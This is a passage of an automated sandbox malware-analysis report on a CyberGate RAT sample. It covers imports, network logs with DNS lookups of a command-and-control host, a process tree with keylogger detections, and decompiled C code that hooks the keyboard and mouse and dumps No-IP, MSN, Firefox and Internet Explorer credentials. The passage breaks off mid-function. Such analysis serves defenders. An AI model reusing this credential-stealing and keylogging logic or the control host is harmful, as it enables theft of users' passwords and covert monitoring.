                                  RT_RCDATA0x15c4c0x184data
                                  RT_RCDATA0x15dd00x39776data
                                  RT_GROUP_ICON0x56af40x14data
                                  RT_GROUP_ICON0x4f55c0x14data

                                  Imports

                                  DLLImport
                                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                  advapi32.dllLsaClose
                                  crypt32.dllCryptUnprotectData
                                  ole32.dllCoTaskMemFree
                                  oleaut32.dllSysFreeString
                                  pstorec.dllPStoreCreateInstance
                                  rasapi32.dllRasEnumEntriesA
                                  shell32.dllSHGetSpecialFolderPathA
                                  user32.dllToAscii

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  04/15/21-23:53:59.096385ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.132632ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                  04/15/21-23:53:59.136851ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.172562ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                  04/15/21-23:53:59.173682ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.209711ICMP449ICMP Time-To-Live Exceeded in Transit130.117.50.25192.168.2.6
                                  04/15/21-23:53:59.210114ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.251240ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.62192.168.2.6
                                  04/15/21-23:53:59.251899ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.298693ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.253192.168.2.6
                                  04/15/21-23:53:59.300326ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.346649ICMP449ICMP Time-To-Live Exceeded in Transit130.117.14.78192.168.2.6
                                  04/15/21-23:53:59.347405ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.409081ICMP449ICMP Time-To-Live Exceeded in Transit195.22.208.117192.168.2.6
                                  04/15/21-23:53:59.411007ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.464244ICMP449ICMP Time-To-Live Exceeded in Transit93.186.128.39192.168.2.6
                                  04/15/21-23:53:59.464946ICMP384ICMP PING192.168.2.62.23.155.232
                                  04/15/21-23:53:59.519363ICMP408ICMP Echo Reply2.23.155.232192.168.2.6

                                  Network Port Distribution

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 15, 2021 23:53:57.356012106 CEST6379153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:53:57.404707909 CEST53637918.8.8.8192.168.2.6
                                  Apr 15, 2021 23:53:57.974400043 CEST6426753192.168.2.68.8.8.8
                                  Apr 15, 2021 23:53:58.022939920 CEST53642678.8.8.8192.168.2.6
                                  Apr 15, 2021 23:53:58.523369074 CEST4944853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:53:58.581073999 CEST53494488.8.8.8192.168.2.6
                                  Apr 15, 2021 23:53:58.969647884 CEST6034253192.168.2.68.8.8.8
                                  Apr 15, 2021 23:53:59.071053028 CEST53603428.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:00.037657976 CEST6134653192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:00.089605093 CEST53613468.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:01.892913103 CEST5177453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:01.941695929 CEST53517748.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:03.003626108 CEST5602353192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:03.062793016 CEST53560238.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:04.283185959 CEST5838453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:04.334734917 CEST53583848.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:05.199903965 CEST6026153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:05.252921104 CEST53602618.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:06.344018936 CEST5606153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:06.394470930 CEST53560618.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:09.476833105 CEST5833653192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:09.525525093 CEST53583368.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:10.995256901 CEST5378153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:11.045006990 CEST53537818.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:12.117697001 CEST5406453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:12.174906969 CEST53540648.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:13.047930956 CEST5281153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:13.100862980 CEST53528118.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:14.821696997 CEST5529953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:14.873748064 CEST53552998.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:15.758128881 CEST6374553192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:15.809355021 CEST53637458.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:16.697487116 CEST5005553192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:16.747389078 CEST53500558.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:17.917047977 CEST6137453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:17.974220991 CEST53613748.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:18.920409918 CEST5033953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:18.969341040 CEST53503398.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:19.716342926 CEST6330753192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:19.764926910 CEST53633078.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:32.457685947 CEST4969453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:32.514893055 CEST53496948.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:37.805726051 CEST5498253192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:37.866144896 CEST53549828.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:52.701009035 CEST5001053192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:52.765266895 CEST53500108.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:53.760749102 CEST6371853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:53.811330080 CEST53637188.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:55.754363060 CEST6211653192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:55.868745089 CEST53621168.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:56.407974958 CEST6381653192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:56.465255022 CEST53638168.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:57.068628073 CEST5501453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:57.125652075 CEST53550148.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:57.185837030 CEST6220853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:57.261985064 CEST53622088.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:57.818519115 CEST5757453192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:57.875533104 CEST53575748.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:58.416580915 CEST5181853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:58.473583937 CEST53518188.8.8.8192.168.2.6
                                  Apr 15, 2021 23:54:59.279212952 CEST5662853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:54:59.331255913 CEST53566288.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:00.632286072 CEST6077853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:00.689613104 CEST53607788.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:01.700973988 CEST5379953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:01.760900974 CEST53537998.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:02.638097048 CEST5468353192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:02.697885036 CEST53546838.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:03.337359905 CEST5932953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:03.386181116 CEST53593298.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:03.942244053 CEST6402153192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:04.003590107 CEST53640218.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:31.699481964 CEST5612953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:31.760138035 CEST53561298.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:44.600035906 CEST5817753192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:44.656975985 CEST53581778.8.8.8192.168.2.6
                                  Apr 15, 2021 23:55:50.481057882 CEST5070053192.168.2.68.8.8.8
                                  Apr 15, 2021 23:55:50.529961109 CEST53507008.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:01.266410112 CEST5406953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:01.323438883 CEST53540698.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:06.435883045 CEST6117853192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:06.486165047 CEST53611788.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:09.279042959 CEST5701753192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:09.336168051 CEST53570178.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:15.060127020 CEST5632753192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:15.119329929 CEST53563278.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:22.432969093 CEST5024353192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:22.578448057 CEST53502438.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:30.548095942 CEST6205553192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:30.607217073 CEST53620558.8.8.8192.168.2.6
                                  Apr 15, 2021 23:56:37.574990034 CEST6124953192.168.2.68.8.8.8
                                  Apr 15, 2021 23:56:37.632180929 CEST53612498.8.8.8192.168.2.6

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Apr 15, 2021 23:56:15.060127020 CEST192.168.2.68.8.8.80xdb05Standard query (0)eduzao.ddns.netA (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:22.432969093 CEST192.168.2.68.8.8.80x101aStandard query (0)eduzao.ddns.netA (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:30.548095942 CEST192.168.2.68.8.8.80x430eStandard query (0)eduzao.ddns.netA (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:37.574990034 CEST192.168.2.68.8.8.80x22f7Standard query (0)eduzao.ddns.netA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Apr 15, 2021 23:56:15.119329929 CEST8.8.8.8192.168.2.60xdb05No error (0)eduzao.ddns.net181.220.140.205A (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:22.578448057 CEST8.8.8.8192.168.2.60x101aNo error (0)eduzao.ddns.net181.220.140.205A (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:30.607217073 CEST8.8.8.8192.168.2.60x430eNo error (0)eduzao.ddns.net181.220.140.205A (IP address)IN (0x0001)
                                  Apr 15, 2021 23:56:37.632180929 CEST8.8.8.8192.168.2.60x22f7No error (0)eduzao.ddns.net181.220.140.205A (IP address)IN (0x0001)

                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: dqH3t8JU1x.exe PID: 6776 Parent PID: 5736

                                  General

                                  Start time:23:54:05
                                  Start date:15/04/2021
                                  Path:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\dqH3t8JU1x.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 3440 Parent PID: 6776

                                  General

                                  Start time:23:54:08
                                  Start date:15/04/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0x7ff6f22f0000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: TEXTURAFIVEM.exe PID: 6984 Parent PID: 3440

                                  General

                                  Start time:23:54:18
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 100%, ReversingLabs
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: TEXTURAFIVEM.exe PID: 7096 Parent PID: 3440

                                  General

                                  Start time:23:54:27
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: TEXTURAFIVEM.exe PID: 4024 Parent PID: 3440

                                  General

                                  Start time:23:54:35
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 2200 Parent PID: 6984

                                  General

                                  Start time:23:55:11
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 5908 Parent PID: 6776

                                  General

                                  Start time:23:55:17
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.629304269.00000000240DB000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 1768 Parent PID: 7096

                                  General

                                  Start time:23:55:28
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.629145832.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: TEXTURAFIVEM.exe PID: 5432 Parent PID: 2200

                                  General

                                  Start time:23:55:30
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: WerFault.exe PID: 6740 Parent PID: 5432

                                  General

                                  Start time:23:55:33
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 4908 Parent PID: 4024

                                  General

                                  Start time:23:55:38
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.630397058.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: WerFault.exe PID: 6872 Parent PID: 5908

                                  General

                                  Start time:23:55:38
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: WerFault.exe PID: 5856 Parent PID: 1768

                                  General

                                  Start time:23:55:44
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: WerFault.exe PID: 5968 Parent PID: 4908

                                  General

                                  Start time:23:55:49
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: dqH3t8JU1x.exe PID: 6776 Parent PID: 5736 dqH3t8JU1x.exeCOMMON

                                    Executed Functions

                                    Function 0040BBF4, Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 333sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				void* _t49;
				void* _t52;
				long _t53;
				void* _t55;
				intOrPtr* _t65;
				void* _t68;
				long _t69;
				char* _t80;
				intOrPtr* _t93;
				long _t97;
				intOrPtr* _t100;
				long _t104;
				intOrPtr* _t107;
				long _t111;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t117;
				void* _t120;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;
				intOrPtr _t229;
				void* _t254;
				void* _t255;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t270;

				_t255 = __esi;
				_t254 = __edi;
				_t257 = _t258;
				_t213 = 0xb;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
				} while (_t213 != 0);
				E00403418(0x40bb04);
				_push(_t257);
				_push(0x40c0c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
				_t209 = _t49;
				if(GetLastError() != 0xb7) {
					CloseHandle(_t209); // executed
				} else {
					CloseHandle(_t209);
					Sleep(0x2ee0);
				}
				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
				_t210 = _t52;
				_t53 = GetLastError();
				_t261 = _t53 - 0xb7;
				if(_t53 != 0xb7) {
					CloseHandle(_t210);
					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
					_t211 = _t55;
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						CloseHandle(_t211);
						L26:
						E004013A4(1,  &_v80);
						_t225 = "Restart";
						E00401E94(_v80, "Restart");
						if(__eflags != 0) {
							Sleep(0x3e8); // executed
						}
						E00404604(_t213, __eflags);
						E0040491C();
						E0040B118(_t225, _t254, _t255);
						_t65 =  *0x40d204; // 0x40e8f8
						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
						_t212 = _t68;
						_t69 = GetLastError();
						__eflags = _t69 - 0xb7;
						if(_t69 != 0xb7) {
							CloseHandle(_t212); // executed
						} else {
							CloseHandle(_t212);
							Sleep(0x3e8);
							_t93 =  *0x40d204; // 0x40e8f8
							_t212 = E00403568(0, 0, E00401F48( *_t93));
							_t97 = GetLastError();
							__eflags = _t97 - 0xb7;
							if(_t97 != 0xb7) {
								CloseHandle(_t212);
							} else {
								CloseHandle(_t212);
								Sleep(0x3e8);
								_t100 =  *0x40d204; // 0x40e8f8
								_t212 = E00403568(0, 0, E00401F48( *_t100));
								_t104 = GetLastError();
								__eflags = _t104 - 0xb7;
								if(_t104 != 0xb7) {
									CloseHandle(_t212);
								} else {
									CloseHandle(_t212);
									Sleep(0x3e8);
									_t107 =  *0x40d204; // 0x40e8f8
									_t212 = E00403568(0, 0, E00401F48( *_t107));
									_t111 = GetLastError();
									__eflags = _t111 - 0xb7;
									if(_t111 != 0xb7) {
										CloseHandle(_t212);
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						__eflags =  *((char*)( *0x40d1dc)) - 1;
						if( *((char*)( *0x40d1dc)) != 1) {
							__eflags = 0;
							E004013A4(0, 0x40f1e8);
						} else {
							E004013A4(0,  &_v88);
							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
							E00401B14(0x40f1e8, _v84);
						}
						E00406008( &_v92);
						E00401D58( &_v92, "XX--XX--XX.txt");
						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
						_t80 =  *0x40d214; // 0x40e8f4
						__eflags =  *_t80 - 1;
						if(__eflags == 0) {
							E0040B7FC(_t212, _t254, _t255, __eflags);
							Sleep(0x3e8); // executed
						}
						E0040B3C0(_t212, _t213, _t254, _t255); // executed
						L43:
						_pop(_t229);
						 *[fs:eax] = _t229;
						_push(0x40c0cb);
						return E00401AE4( &_v92, 0x12);
					}
					CloseHandle(_t211);
					_t114 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
					_t117 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
					while(1) {
						_t120 = E0040BA84(__eflags);
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						E00405918();
					}
					ExitProcess(0);
					goto L26;
				}
				CloseHandle(_t210);
				E00409AD4( &_v24, _t210, _t255, _t261);
				E00401B14(0x40f1ec, _v24);
				_t262 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v28);
					E00401D58( &_v28, "NOIP.abc");
					_pop(_t222);
					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
				}
				E00409D28( &_v32, _t210, _t254, _t255);
				_t235 = _v32;
				E00401B14(0x40f1ec, _v32);
				_t263 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v36);
					E00401D58( &_v36, "MSN.abc");
					_t235 =  *0x40f1ec;
					_pop(_t221);
					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
				}
				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
				E00401B14(0x40f1ec, _v40);
				_t264 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v44);
					E00401D58( &_v44, "FIREFOX.abc");
					_pop(_t220);
					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
				}
				E00409A84( &_v48);
				E00401B14(0x40f1ec, _v48);
				_t265 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v52);
					E00401D58( &_v52, "IELOGIN.abc");
					_pop(_t219);
					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
				}
				E00409A90( &_v56);
				E00401B14(0x40f1ec, _v56);
				_t266 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v60);
					E00401D58( &_v60, "IEPASS.abc");
					_pop(_t218);
					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
				}
				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
				E00401B14(0x40f1ec, _v64);
				_t267 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v68);
					E00401D58( &_v68, "IEAUTO.abc");
					_pop(_t217);
					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
				}
				E00409AB8( &_v72, _t254, _t255, _t267);
				E00401B14(0x40f1ec, _v72);
				_t268 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v76);
					E00401D58( &_v76, "IEWEB.abc");
					_pop(_t216);
